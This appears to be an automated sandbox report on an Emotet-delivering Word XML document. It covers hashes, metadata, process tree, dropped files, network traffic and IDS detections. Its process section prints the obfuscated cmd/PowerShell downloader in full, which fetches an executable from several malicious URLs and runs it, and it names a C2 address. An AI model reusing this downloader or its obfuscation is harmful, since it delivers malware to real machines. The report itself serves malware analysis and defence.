analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
download:

Need-to-send-the-attachment

Full analysis: https://app.any.run/tasks/6ac484a9-e0d3-41e5-b998-242293f6ec95
Verdict: Malicious activity
Threats:

Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns.

Analysis date: January 18, 2019, 02:46:49
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
loader
trojan
emotet
feodo
Indicators:
MIME: text/xml
File info: XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
MD5:

047CCA99D10D4EFDB7F6283E82843E6D

SHA1:

337EC60C8B84CE7FD5C6723D97BDBF1A95FAD842

SHA256:

EB24104819BEDF325326D772237AB87123274F0452520C82D67D24F1CD2DB800

SSDEEP:

6144:6v/ybBPDDMkqWqs6vOtX0OEDzYUTE7yZRVUi8E:4/GJsOtX0BzEmZRGi7

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Unusual execution from Microsoft Office

      • WINWORD.EXE (PID: 2664)
    • Starts CMD.EXE for commands execution

      • WINWORD.EXE (PID: 2664)
    • Executes PowerShell scripts

      • cmd.exe (PID: 3912)
    • Application was dropped or rewritten from another process

      • 486.exe (PID: 3868)
      • 486.exe (PID: 3812)
      • wabmetagen.exe (PID: 3892)
      • wabmetagen.exe (PID: 2672)
    • Downloads executable files from the Internet

      • powershell.exe (PID: 2480)
    • EMOTET was detected

      • wabmetagen.exe (PID: 2672)
    • Changes the autorun value in the registry

      • wabmetagen.exe (PID: 2672)
  • SUSPICIOUS

    • Starts Microsoft Office Application

      • MSOXMLED.EXE (PID: 2972)
    • Creates files in the user directory

      • powershell.exe (PID: 2480)
    • Executable content was dropped or overwritten

      • powershell.exe (PID: 2480)
      • 486.exe (PID: 3868)
    • Application launched itself

      • 486.exe (PID: 3812)
    • Starts itself from another location

      • 486.exe (PID: 3868)
  • INFO

    • Creates files in the user directory

      • WINWORD.EXE (PID: 2664)
    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 2664)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.xml | Microsoft Office XML Flat File Format Word Document (ASCII) (65.1)
.xml | Microsoft Office XML Flat File Format (ASCII) (31)
.xml | Generic XML (ASCII) (2.3)
.html | HyperText Markup Language (1.4)

EXIF

XMP

WordDocumentMacrosPresent: yes
WordDocumentEmbeddedObjPresent: no
WordDocumentOcxPresent: no
WordDocumentIgnoreSubtreeVal: http://schemas.microsoft.com/office/word/2003/wordml/sp2
WordDocumentDocumentPropertiesRevision: 1
WordDocumentDocumentPropertiesTotalTime: -
WordDocumentDocumentPropertiesCreated: 2019:01:17 16:24:00Z
WordDocumentDocumentPropertiesLastSaved: 2019:01:17 16:24:00Z
WordDocumentDocumentPropertiesPages: 1
WordDocumentDocumentPropertiesWords: 15
WordDocumentDocumentPropertiesCharacters: 86
WordDocumentDocumentPropertiesLines: 1
WordDocumentDocumentPropertiesParagraphs: 1
WordDocumentDocumentPropertiesCharactersWithSpaces: 100
WordDocumentDocumentPropertiesVersion: 16
WordDocumentFontsDefaultFontsAscii: Calibri
WordDocumentFontsDefaultFontsFareast: Calibri
WordDocumentFontsDefaultFontsH-ansi: Calibri
WordDocumentFontsDefaultFontsCs: Times New Roman
WordDocumentFontsFontName: Times New Roman
WordDocumentFontsFontPanose-1Val: 02020603050405020304
WordDocumentFontsFontCharsetVal: 00
WordDocumentFontsFontFamilyVal: Roman
WordDocumentFontsFontPitchVal: variable
WordDocumentFontsFontSigUsb-0: E0002AFF
WordDocumentFontsFontSigUsb-1: C0007841
WordDocumentFontsFontSigUsb-2: 00000009
WordDocumentFontsFontSigUsb-3: 00000000
WordDocumentFontsFontSigCsb-0: 000001FF
WordDocumentFontsFontSigCsb-1: 00000000
WordDocumentStylesVersionOfBuiltInStylenamesVal: 7
WordDocumentStylesLatentStylesDefLockedState: off
WordDocumentStylesLatentStylesLatentStyleCount: 375
WordDocumentStylesLatentStylesLsdExceptionName: Normal
WordDocumentStylesStyleType: paragraph
WordDocumentStylesStyleDefault: on
WordDocumentStylesStyleStyleId: Normal
WordDocumentStylesStyleNameVal: Normal
WordDocumentStylesStylePPrSpacingAfter: 160
WordDocumentStylesStylePPrSpacingLine: 259
WordDocumentStylesStylePPrSpacingLine-rule: auto
WordDocumentStylesStyleRPrFontVal: Calibri
WordDocumentStylesStyleRPrSzVal: 22
WordDocumentStylesStyleRPrSz-csVal: 22
WordDocumentStylesStyleRPrLangVal: EN-US
WordDocumentStylesStyleRPrLangFareast: EN-US
WordDocumentStylesStyleRPrLangBidi: AR-SA
WordDocumentStylesStyleUiNameVal: Table Normal
WordDocumentStylesStyleTblPrTblIndW: -
WordDocumentStylesStyleTblPrTblIndType: dxa
WordDocumentStylesStyleTblPrTblCellMarTopW: -
WordDocumentStylesStyleTblPrTblCellMarTopType: dxa
WordDocumentStylesStyleTblPrTblCellMarLeftW: 108
WordDocumentStylesStyleTblPrTblCellMarLeftType: dxa
WordDocumentStylesStyleTblPrTblCellMarBottomW: -
WordDocumentStylesStyleTblPrTblCellMarBottomType: dxa
WordDocumentStylesStyleTblPrTblCellMarRightW: 108
WordDocumentStylesStyleTblPrTblCellMarRightType: dxa
WordDocumentStylesStyleBasedOnVal: Normal
WordDocumentStylesStyleLinkVal: BalloonTextChar
WordDocumentStylesStyleRsidVal: 005A24B1
WordDocumentStylesStyleRPrRFontsAscii: Tahoma
WordDocumentStylesStyleRPrRFontsH-ansi: Tahoma
WordDocumentStylesStyleRPrRFontsCs: Tahoma
WordDocumentDocSuppDataBinDataName: editdata.mso
WordDocumentDocSuppDataBinData: (Binary data 96630 bytes, use -b option to extract)
WordDocumentShapeDefaultsShapedefaultsExt: edit
WordDocumentShapeDefaultsShapedefaultsSpidmax: 1026
WordDocumentShapeDefaultsShapelayoutExt: edit
WordDocumentShapeDefaultsShapelayoutIdmapExt: edit
WordDocumentShapeDefaultsShapelayoutIdmapData: 1
WordDocumentDocPrViewVal: print
WordDocumentDocPrZoomPercent: 100
WordDocumentDocPrRemovePersonalInformation: -
WordDocumentDocPrDoNotEmbedSystemFonts: -
WordDocumentDocPrDefaultTabStopVal: 720
WordDocumentDocPrPunctuationKerning: -
WordDocumentDocPrCharacterSpacingControlVal: DontCompress
WordDocumentDocPrOptimizeForBrowser: -
WordDocumentDocPrDoNotSaveWebPagesAsSingleFile: -
WordDocumentDocPrPixelsPerInchVal: 120
WordDocumentDocPrValidateAgainstSchema: -
WordDocumentDocPrSaveInvalidXMLVal: off
WordDocumentDocPrIgnoreMixedContentVal: off
WordDocumentDocPrAlwaysShowPlaceholderTextVal: off
WordDocumentDocPrCompatBreakWrappedTables: -
WordDocumentDocPrCompatSnapToGridInCell: -
WordDocumentDocPrCompatWrapTextWithPunct: -
WordDocumentDocPrCompatUseAsianBreakRules: -
WordDocumentDocPrCompatDontGrowAutofit: -
WordDocumentDocPrRsidsRsidRootVal: 005E6EE1
WordDocumentDocPrRsidsRsidVal: 00554C54
WordDocumentBodySectPRsidR: 005E6EE1
WordDocumentBodySectPRsidRDefault: 00554C54
WordDocumentBodySectPRRsidRPr: 005241E0
WordDocumentBodySectPRRPrNoProof: -
WordDocumentBodySectPRPictShapetypeId: _x0000_t75
WordDocumentBodySectPRPictShapetypeCoordsize: 21600,21600
WordDocumentBodySectPRPictShapetypeSpt: 75
WordDocumentBodySectPRPictShapetypePreferrelative: t
WordDocumentBodySectPRPictShapetypePath: m@4@5l@4@11@9@11@9@5xe
WordDocumentBodySectPRPictShapetypeFilled: f
WordDocumentBodySectPRPictShapetypeStroked: f
WordDocumentBodySectPRPictShapetypeStrokeJoinstyle: miter
WordDocumentBodySectPRPictShapetypeFormulasFEqn: if lineDrawn pixelLineWidth 0
WordDocumentBodySectPRPictShapetypePathExtrusionok: f
WordDocumentBodySectPRPictShapetypePathGradientshapeok: t
WordDocumentBodySectPRPictShapetypePathConnecttype: rect
WordDocumentBodySectPRPictShapetypeLockExt: edit
WordDocumentBodySectPRPictShapetypeLockAspectratio: t
WordDocumentBodySectPRPictBinDataName: wordml://02000001.jpg
WordDocumentBodySectPRPictBinData: (Binary data 111550 bytes, use -b option to extract)
WordDocumentBodySectPRPictShapeId: Picture 1
WordDocumentBodySectPRPictShapeSpid: _x0000_i1025
WordDocumentBodySectPRPictShapeType: #_x0000_t75
WordDocumentBodySectPRPictShapeStyle: width:468pt;height:115.5pt;visibility:visible;mso-wrap-style:square
WordDocumentBodySectPRPictShapeImagedataSrc: wordml://02000001.jpg
WordDocumentBodySectPRPictShapeImagedataTitle: -
WordDocumentBodySectPRT:
WordDocumentBodySectSectPrRsidR: 005E6EE1
WordDocumentBodySectSectPrPgSzW: 12240
WordDocumentBodySectSectPrPgSzH: 15840
WordDocumentBodySectSectPrPgMarTop: 1440
WordDocumentBodySectSectPrPgMarRight: 1440
WordDocumentBodySectSectPrPgMarBottom: 1440
WordDocumentBodySectSectPrPgMarLeft: 1440
WordDocumentBodySectSectPrPgMarHeader: 720
WordDocumentBodySectSectPrPgMarFooter: 720
WordDocumentBodySectSectPrPgMarGutter: -
WordDocumentBodySectSectPrColsSpace: 720
WordDocumentBodySectSectPrDocGridLine-pitch: 360
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
39
Monitored processes
8
Malicious processes
8
Suspicious processes
0

Behavior graph

Click at the process to see the details
start drop and start drop and start msoxmled.exe no specs winword.exe no specs cmd.exe no specs powershell.exe 486.exe no specs 486.exe wabmetagen.exe no specs #EMOTET wabmetagen.exe

Process information

PID
CMD
Path
Indicators
Parent process
2972"C:\Program Files\Common Files\Microsoft Shared\OFFICE14\MSOXMLED.EXE" /verb open "C:\Users\admin\AppData\Local\Temp\Need-to-send-the-attachment.xml"C:\Program Files\Common Files\Microsoft Shared\OFFICE14\MSOXMLED.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
XML Editor
Exit code:
0
Version:
14.0.4750.1000
2664"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\Need-to-send-the-attachment.xml"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEMSOXMLED.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
3912"C:\Windows\system32\cmd.exe" /c pow%PUBLIC:~5,1%r%SESSIONNAME:~-4,1%h%TEMP:~-3,1%ll $HandmadeCottonChips13='EXE70';$transition33=new-object Net.WebClient;$Identity75='http://fleetstreetstudios.co.za/LcX6_wx2gkPUh@http://pentick.space/8EVxz_Uvsd_4@http://www.ipbempreende.com.br/d2gp7Tj_xfPR2@http://plottermais.com/geYz_l5Du@http://aplusglass-parebrise-anet.fr/T4V4_LvALup08_FOXAtN'.Split('@');$payment33='incentivize40';$HomeLoanAccount64 = '486';$collaboration49='Idaho42';$protocol23=$env:public+'\'+$HomeLoanAccount64+'.exe';foreach($core43 in $Identity75){try{$transition33.DownloadFile($core43, $protocol23);$CanadianDollar73='Utah94';If ((Get-Item $protocol23).length -ge 80000) {Invoke-Item $protocol23;$InvestmentAccount27='wireless54';break;}}catch{}}$Avon62='Granite93'; C:\Windows\system32\cmd.exeWINWORD.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
2480powershell $HandmadeCottonChips13='EXE70';$transition33=new-object Net.WebClient;$Identity75='http://fleetstreetstudios.co.za/LcX6_wx2gkPUh@http://pentick.space/8EVxz_Uvsd_4@http://www.ipbempreende.com.br/d2gp7Tj_xfPR2@http://plottermais.com/geYz_l5Du@http://aplusglass-parebrise-anet.fr/T4V4_LvALup08_FOXAtN'.Split('@');$payment33='incentivize40';$HomeLoanAccount64 = '486';$collaboration49='Idaho42';$protocol23=$env:public+'\'+$HomeLoanAccount64+'.exe';foreach($core43 in $Identity75){try{$transition33.DownloadFile($core43, $protocol23);$CanadianDollar73='Utah94';If ((Get-Item $protocol23).length -ge 80000) {Invoke-Item $protocol23;$InvestmentAccount27='wireless54';break;}}catch{}}$Avon62='Granite93'; C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
3812"C:\Users\Public\486.exe" C:\Users\Public\486.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft IE hosting interface
Exit code:
0
Version:
1.0.3705.6018
3868"C:\Users\Public\486.exe"C:\Users\Public\486.exe
486.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft IE hosting interface
Exit code:
0
Version:
1.0.3705.6018
3892"C:\Users\admin\AppData\Local\wabmetagen\wabmetagen.exe"C:\Users\admin\AppData\Local\wabmetagen\wabmetagen.exe486.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft IE hosting interface
Exit code:
0
Version:
1.0.3705.6018
2672"C:\Users\admin\AppData\Local\wabmetagen\wabmetagen.exe"C:\Users\admin\AppData\Local\wabmetagen\wabmetagen.exe
wabmetagen.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft IE hosting interface
Version:
1.0.3705.6018
Total events
1 789
Read events
1 373
Write events
0
Delete events
0

Modification events

No data
Executable files
2
Suspicious files
2
Text files
0
Unknown types
2

Dropped files

PID
Process
Filename
Type
2664WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVRE88F.tmp.cvr
MD5:
SHA256:
2664WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\B97C0032.jpg
MD5:
SHA256:
2480powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\5YJLCY601KIDID7EGD26.temp
MD5:
SHA256:
2664WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:7A19443DBC550986EE24C0177493108D
SHA256:EF9C58396679C6043C2BF0915D085527FA083260107AA6C4E2E6B7CDF2915C73
2480powershell.exeC:\Users\Public\486.exeexecutable
MD5:249C44EEE6C0D28DEDBB55E7646A7B54
SHA256:9543B8B3E2B8331274A0A17DAC75C43E109763D8689C46A77ECBCC15ADF493A6
2480powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF20f0fb.TMPbinary
MD5:2BCAD5DA21CB41B727ABDE7D6B6990B8
SHA256:AB1397E3A31059329829AE2164787589945B1459ED2E1B7328E86ED497A6F9F3
3868486.exeC:\Users\admin\AppData\Local\wabmetagen\wabmetagen.exeexecutable
MD5:249C44EEE6C0D28DEDBB55E7646A7B54
SHA256:9543B8B3E2B8331274A0A17DAC75C43E109763D8689C46A77ECBCC15ADF493A6
2664WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~$ed-to-send-the-attachment.xmlpgc
MD5:631783F3BFBFEA214773C5F6F484F7EB
SHA256:DC5B4C5F07453F6AD3D54A4F54D1A949DB8B8E61DDCAE44E80C058FC7476A2C5
2480powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msbinary
MD5:2BCAD5DA21CB41B727ABDE7D6B6990B8
SHA256:AB1397E3A31059329829AE2164787589945B1459ED2E1B7328E86ED497A6F9F3
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
3
TCP/UDP connections
2
DNS requests
1
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
2480
powershell.exe
GET
200
154.0.164.160:80
http://fleetstreetstudios.co.za/LcX6_wx2gkPUh/
ZA
executable
144 Kb
malicious
2480
powershell.exe
GET
301
154.0.164.160:80
http://fleetstreetstudios.co.za/LcX6_wx2gkPUh
ZA
html
254 b
malicious
2672
wabmetagen.exe
GET
200
190.138.221.70:53
http://190.138.221.70:53/
AR
binary
132 b
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
2480
powershell.exe
154.0.164.160:80
fleetstreetstudios.co.za
Afrihost
ZA
suspicious
2672
wabmetagen.exe
190.138.221.70:53
Telecom Argentina S.A.
AR
malicious

DNS requests

Domain
IP
Reputation
fleetstreetstudios.co.za
  • 154.0.164.160
malicious

Threats

PID
Process
Class
Message
2480
powershell.exe
Potential Corporate Privacy Violation
ET POLICY PE EXE or DLL Windows file download HTTP
2480
powershell.exe
Potentially Bad Traffic
ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download
2480
powershell.exe
Misc activity
ET INFO EXE - Served Attached HTTP
2672
wabmetagen.exe
A Network Trojan was detected
ET TROJAN HTTP GET Request on port 53 - Very Likely Hostile
2672
wabmetagen.exe
A Network Trojan was detected
SC SPYWARE Spyware Emotet Win32
2672
wabmetagen.exe
A Network Trojan was detected
MALWARE [PTsecurity] Feodo HTTP request
No debug info